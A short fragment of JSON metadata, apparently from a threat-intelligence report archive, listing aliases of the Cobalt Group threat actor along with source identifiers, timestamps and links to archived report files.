				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434580,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ec14be3cc488c68aa11538b12bb29e5c71bab049.pdf",
		"text": "https://archive.orkl.eu/ec14be3cc488c68aa11538b12bb29e5c71bab049.txt",
		"img": "https://archive.orkl.eu/ec14be3cc488c68aa11538b12bb29e5c71bab049.jpg"
	}
}